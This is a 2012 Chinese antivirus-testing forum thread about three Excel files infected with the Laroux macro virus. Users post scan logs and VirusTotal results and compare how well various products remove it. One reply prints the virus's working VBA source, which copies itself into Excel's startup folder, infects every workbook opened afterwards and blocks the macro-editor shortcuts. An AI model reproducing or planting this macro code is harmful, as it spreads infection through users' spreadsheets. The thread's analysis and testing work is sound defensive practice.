宏病毒3例测试

寒山竹语

qzmxy2006 发表于 2012-9-28 23:24
黑屏了么。。

这类样本不黑屏的。

zpforyou

downed it

284678343

1. 黄骅港供电工队2012年10月接触网检修计划报表.xls        Virus.MSExcel.Laroux.jm        已删除        2012/09/29 星期六 11:20:37        C:\Users\Chobits\Virus\       
   
2. 黄骅港供电工队2012年09月接触网月报表.xls        Virus.MSExcel.Laroux.jm        已删除        2012/09/29 星期六 11:20:37        C:\Users\Chobits\Virus\       
   
3. 黄骅港供电工队2012年09月接触网检修完成报表.xls        Virus.MSExcel.Laroux.jm        已删除        2012/09/29 星期六 11:20:33        C:\Users\Chobits\Virus\       
   

复制代码

村支部书记

comodo行不行啊，谁测试一下

colorama

vm001 发表于 2012-9-28 16:09
看来你开了红伞引擎

不好意思，没开红伞引擎。

784696777

毒霸双击后拦截

zhousulin5

这个宏很温柔的样子。至少在禁用宏的情况下可以打开文件。

Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
    End Sub

附手工删除宏后的文件，virustotal检查结果：SHA256:         7cf6a7ee40ce56711c62201492ebf1c4022bbbd56611f4cd2aec70be982f03fb
File name:         手工删宏后.rar
Detection ratio:         0 / 42
Analysis date:         2012-09-29 12:51:53 UTC ( 0 分钟 ago )



吐槽一下，virscan咋那么慢啊，人virustotal都查完五个了，它一个才84％。

qpzmggg999

寒山竹语 发表于 2012-9-28 13:52
美系三大应该都可以修复的。我一看趋势成功修复三个，就知道那两家也一定可以了。

咖啡全部修复

七少

我没安装office 我说费尔怎么没反应了

小飞侠.net

试一下：360杀毒4.0.13093A同样也不能完美清除，确认是删除的说！